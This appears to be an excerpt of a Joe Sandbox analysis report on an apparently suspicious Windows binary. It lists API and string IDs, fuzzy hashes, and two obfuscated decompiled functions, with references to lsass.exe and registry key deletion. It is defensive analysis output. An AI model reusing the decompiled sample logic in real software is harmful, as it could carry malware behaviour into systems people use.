                      • String ID: G`}$RegDeleteKeyExW$WFServicesReg.exe
                      • API String ID: 1029625771-3140686132
                      • Opcode ID: 000cb13309da6fa004a5e35d5f0782a81a3df6270ff43b311553ec43ff7b7125
                      • Instruction ID: d29cd288cd4b5d9b4da6569fe837411927f50a79af695c2348c33b52e7c0974b
                      • Opcode Fuzzy Hash: 000cb13309da6fa004a5e35d5f0782a81a3df6270ff43b311553ec43ff7b7125
                      • Instruction Fuzzy Hash: 7F417975E503469FCB00EFA9D8D42CD7BB1EB69320F14806AD945E7361E3780989DB85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: SleepTerminateThread
                      • String ID: NtSetDriverEntryOrder$`}
                      • API String ID: 480259992-4248525211
                      • Opcode ID: 5bd84efa852eec449e98121a4b51aca970a9d75e68d145accd1f428c5508e70f
                      • Instruction ID: c47e212faeb9391b402aa1c97f1b3dc505a8ab021d7480125ec56fb57a38c2cb
                      • Opcode Fuzzy Hash: 5bd84efa852eec449e98121a4b51aca970a9d75e68d145accd1f428c5508e70f
                      • Instruction Fuzzy Hash: E3319D76A552079BDB00EF74ECE82CD3BB1EB78314F04816AC44997766E3390A89EB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: OSProvider.dll$System.Net.Primitives.dll$ucmhc.dll
                      • API String ID: 1029625771-3428230003
                      • Opcode ID: bb5de39c012d8abe049839e6621093e96f6a4b1dc0eb46ab8823c66ab3196ec1
                      • Instruction ID: b560873ed2d671b8b0cc070bc426a97e9db56d699a5e1936602f8315160afb76
                      • Opcode Fuzzy Hash: bb5de39c012d8abe049839e6621093e96f6a4b1dc0eb46ab8823c66ab3196ec1
                      • Instruction Fuzzy Hash: 0231E9A5F543478FDB009F75EC985CD3BB0FB7A320B08496AC8548776AF3290549EB46
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E004D6F26(int __eax, signed int __ebx, short __ecx, void* __edx) {
                      				int _t17;
                      				int _t23;
                      				int _t31;
                      				signed int _t32;
                      				signed int _t33;
                      				void* _t34;
                      				intOrPtr _t38;
                      				short _t49;
                      				void* _t54;
                      				short _t56;
                      				intOrPtr _t57;
                      				void* _t61;
                      				void* _t62;
                      				void* _t63;
                      				void* _t64;
                      
                      				_t54 = __edx;
                      				_t49 = __ecx;
                      				_t32 = __ebx;
                      				_t17 = __eax;
                      				if(__ebx == __ebx) {
                      					_t32 = "NtSetDriverEntryOrder";
                      				}
                      				if(_t49 <= _t49) {
                      					if(_t49 == _t49) {
                      						_t49 = _t49 + 0x6f3ef1;
                      					}
                      					 *0x50bf10 =  *0x50bf10 - _t54;
                      				}
                      				_t56 =  *0x509212; // 0xc472
                      				_t62 = 0xab58;
                      				if(_t17 != 1) {
                      					L9:
                      					_t33 = _t32 + 0xef;
                      					 *(_t64 - 8) = _t17;
                      					if(_t33 <= 0x2efd) {
                      						L13:
                      						 *0x509180 = 0x6739;
                      						_t57 =  *0x5091b2; // 0x23e0
                      						_t58 = _t57 - 0x9688;
                      						 *0x50921e = _t57 - 0x9688;
                      						_t63 = _t62;
                      						 *0x50bf14 = 0xc1;
                      						_t34 = _t33 - 0xa;
                      						_t23 = InternetCloseHandle( *(_t64 - 0x24));
                      						_t35 = _t34 - 0x26d200;
                      						 *(_t64 - 8) = _t23;
                      						E004BE19A(_t23, _t58, _t61, _t63, _t34 - 0x26d200, 1, _t35);
                      						_push(0);
                      						_push(1);
                      						_push(E004D747D);
                      						goto __ebx;
                      					}
                      					_t38 =  *0x509ccc; // 0x0
                      					 *((intOrPtr*)(_t64 - 0xc)) =  *((intOrPtr*)(_t64 - 0xc)) + _t38;
                      					 *0x5091ca = _t56;
                      					 *0x50bf12 =  *0x50bf12 - _t17;
                      					 *0x50bf13 =  *0x50bf13 + _t17;
                      					_t62 = _t62 + _t62;
                      					if(_t62 < 0) {
                      						 *0x50bf15 = _t17;
                      					}
                      					_t33 = _t38 + 0x00000038 >> 0x00007dd5 ^ 0x00475dae;
                      					goto L13;
                      				} else {
                      					 *(_t64 - 8) = _t17;
                      					_t32 =  !0x408ebf;
                      					 *0x50911c = _t49;
                      					if( *((intOrPtr*)(_t64 - 0x48)) == 0) {
                      						goto L9;
                      					}
                      					 *(_t64 - 8) =  *(_t64 - 8) - 0x50908a;
                      					 *(_t64 - 8) = _t17;
                      					 *0x509b54 = 0x50908a;
                      					_t31 =  *(_t64 - 8);
                      					 *0x50bf0d = 1;
                      					 *(_t64 - 8) = _t31;
                      					 *0x50915a =  *0x50915a - _t49;
                      					_push(E004D6FC9);
                      					_push(E004ACF9D);
                      					return _t31;
                      				}
                      			}



















                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: NtPowerInformation$NtSetDriverEntryOrder$api-ms-win-core-string-l1-1-0.dll
                      • API String ID: 0-3511679661
                      • Opcode ID: 8657f87f0b2a316015e9e3f84ef9c322977aaa3de5810a0e3b78c26f2723ba66
                      • Instruction ID: b1726d6c541e8e13319ae4cabb8bf0908c3974fb621d7a5d687123523e960fc5
                      • Opcode Fuzzy Hash: 8657f87f0b2a316015e9e3f84ef9c322977aaa3de5810a0e3b78c26f2723ba66
                      • Instruction Fuzzy Hash: 3B31EF36A143069EDB109FB8DCE46CD3FB1EB78300F08846BD954973AAE3740A49EB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: _Z2$lsass.exe$`}
                      • API String ID: 3964851224-222179090
                      • Opcode ID: 04a93955ed76a07559b174304d03654fcd9058efb7b0e8f80b0ef264517d0523
                      • Instruction ID: c14262cc0cfc577d7e527d6ba04e30c59e9974aeddc396c4240b4b10ec982f51
                      • Opcode Fuzzy Hash: 04a93955ed76a07559b174304d03654fcd9058efb7b0e8f80b0ef264517d0523
                      • Instruction Fuzzy Hash: 9131C074A5120A8FDB00EF75DC986CD3B71EF3A304F04802AC8449B36BE3790A49EB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      • wuapi.dll, xrefs: 0048304E
                      • api-ms-win-core-string-l1-1-0.dll, xrefs: 004830A3
                      • api-ms-win-core-localization-l1-1-0.dll, xrefs: 00483094
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$wuapi.dll
                      • API String ID: 190572456-3045657114
                      • Opcode ID: 3499ff0237c74093f48473be7e281adb5b4eb879b23861b0b5f48fa057f14407
                      • Instruction ID: ce677e28918c82482630ba1c3e801c863cfc24e41e4b66ce76800d8eba39b263
                      • Opcode Fuzzy Hash: 3499ff0237c74093f48473be7e281adb5b4eb879b23861b0b5f48fa057f14407
                      • Instruction Fuzzy Hash: 94112A74F8030A9BDB00EFB8D8D56CDBBB0FB29710F44406A9984E3316E2785A85DB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 40%
                      			E004D747D(void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi) {
                      				int _t27;
                      				char* _t29;
                      				char* _t31;
                      				int _t33;
                      				char* _t37;
                      				char* _t46;
                      				signed int _t54;
                      				signed int _t68;
                      				void* _t71;
                      				void* _t73;
                      				void* _t75;
                      
                      				_t73 = __esi;
                      				_t71 = __edi;
                      				_t32 = __ebx;
                      				_t23 =  *(_t75 - 8);
                      				_push( *((intOrPtr*)(_t75 - 0x20)));
                      				 *0x509160 = __ecx;
                      				_t54 = 0;
                      				if(__ebx <= 0x2e6b) {
                      					_t32 = 0x45eaa7;
                      					_t54 =  !0x00000077;
                      				}
                      				_t68 =  *0x5091fe; // 0x8d5f
                      				 *0x50bf15 = E004B78F3(_t23 - 0xcf, _t32, _t54, 0, _t71, 0);
                      				_t27 = InternetCloseHandle(??);
                      				_t33 = _t27;
                      				if( *((intOrPtr*)(_t75 - 0x2050)) <= 0x100000) {
                      					 *(_t75 - 0xc) = _t33;
                      					 *(_t75 - 8) = _t27;
                      					_t37 =  *(_t75 - 0xc);
                      					 *0x50bf0e =  *0x50bf0e - 0x64af;
                      					 *0x50bf0e =  *0x50bf0e + 0x64af;
                      					E004CA23E(_t27, _t37, _t68, _t71, _t73);
                      					_t29 =  *(_t75 - 8);
                      					if( *((intOrPtr*)(_t75 - 0x2050)) > 0) {
                      						_t73 = 0;
                      						_t46 =  &(_t37[0x19a]);
                      						 *(_t75 - 8) = _t29;
                      						_t29 = "Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll";
                      						 *0x509d04 = _t46;
                      						_push(1);
                      						_push(1);
                      						_push(_t46);
                      						_push(E004D9A79);
                      						goto __ebx;
                      					}
                      					if(0xc95e != 0xc95e) {
                      						L10:
                      						 *0x50bf15 = _t29;
                      						if(_t29 >= 0xb) {
                      							 *0x50903e =  *0x50903e + _t29;
                      						}
                      						 *0x5098d8 = _t29;
                      					} else {
                      						if((_t68 & 0x007a289b) == 0) {
                      							goto L10;
                      						}
                      					}
                      					 *(_t75 - 0xc) = 0x3b7426;
                      					_push( *((intOrPtr*)(_t75 - 0x204c)));
                      					 *(_t75 - 8) = 0x3b7426;
                      					 *(_t75 - 8) = _t29;
                      					_push(E004D9C89);
                      					_push(E004ABEF8);
                      					return  *(_t75 - 8);
                      				} else {
                      					 *(_t75 - 8) = _t27;
                      					_t31 =  *(_t75 - 8);
                      					 *(_t75 - 8) = _t31;
                      					 *0x5090c4 =  *0x5090c4 - 0x2f40d9;
                      					_push(0x2f40d9);
                      					_push(E004D7525);
                      					_push(E004A7263);
                      					return _t31;
                      				}
                      			}















                      APIs
                      • InternetCloseHandle.WININET(?), ref: 004D74D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CloseHandleInternet
                      • String ID: SetMagnificationDesktopColorEffect$k.$~u<
                      • API String ID: 1081599783-1246232966
                      • Opcode ID: 3df1d36a4490279f77efc6def4146ba34226ad3000170e01ac1d3022220510a0
                      • Instruction ID: d71270241184a957727ce23a4824c858840cffb674152b7a76dba5d64002c0a0
                      • Opcode Fuzzy Hash: 3df1d36a4490279f77efc6def4146ba34226ad3000170e01ac1d3022220510a0
                      • Instruction Fuzzy Hash: 8D01B535F08345ABD711AFA4DCAABCE7BB1F768314F00406AA505977A6E7780A44DB04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 00476DEA
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: HMETAFILEPICT_UserSize$WFServicesReg.exe
                      • API String ID: 190572456-4294952848
                      • Opcode ID: 343ea60e68344f5c4831986dd5e0e7d04e0aced1e2872b20cf81d5c619833ec8
                      • Instruction ID: 95308b3327b3a4602a48570b9f8f40c471b3726032f966381c3c0b051c1efd9c
                      • Opcode Fuzzy Hash: 343ea60e68344f5c4831986dd5e0e7d04e0aced1e2872b20cf81d5c619833ec8
                      • Instruction Fuzzy Hash: 2231CD75E447069FDB019FB8EC842DD7FB2FB79300F18846A9448E7366E3780A049B49
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$WFServicesReg.exe
                      • API String ID: 190572456-3986490578
                      • Opcode ID: 00273bae720655747080f24c3a4638eae955bc97fbb5aea02625aa5fe2a4d7a7
                      • Instruction ID: 9fb4c9412e1d2e6c463f6f32990ec3d5f4ba1efa244fcf20efb155b5819e652a
                      • Opcode Fuzzy Hash: 00273bae720655747080f24c3a4638eae955bc97fbb5aea02625aa5fe2a4d7a7
                      • Instruction Fuzzy Hash: D1214C31B142038FDB109F39EC882CD3F71EB76320B088A2AD865873A9D3350909EB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CoLockObjectExternal$ucmhc.dll
                      • API String ID: 190572456-642180313
                      • Opcode ID: f81f5b9af814e7a5ce3f690ca8b1236cc320492e0c804d40170fa60f83f7ed9e
                      • Instruction ID: 9d1b222fdaa57484d614c9eae648fa111678018cce701875eef80adfee206b24
                      • Opcode Fuzzy Hash: f81f5b9af814e7a5ce3f690ca8b1236cc320492e0c804d40170fa60f83f7ed9e
                      • Instruction Fuzzy Hash: 9A21F479E543065FDB009FB4E8A42CE7BB0EB3A304F44843AD845AB366E3780949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FindWindow
                      • String ID: NlsLexicons001d.dll$_0(
                      • API String ID: 134000473-4283637930
                      • Opcode ID: 1a421af918a276840c6cca0b1674cc1c0c35ab0b4eecb1da7b45860f09c41978
                      • Instruction ID: 8b406c63b2544e839198a97db6f46c5b99a85fd016b24792b768d4cdaa291694
                      • Opcode Fuzzy Hash: 1a421af918a276840c6cca0b1674cc1c0c35ab0b4eecb1da7b45860f09c41978
                      • Instruction Fuzzy Hash: 05E0C2293A03022BDE406D749DA9BE42E86AF78F14F5001267216FB3C6E1EA04808765
                      Uniqueness

                      Uniqueness Score: -1.00%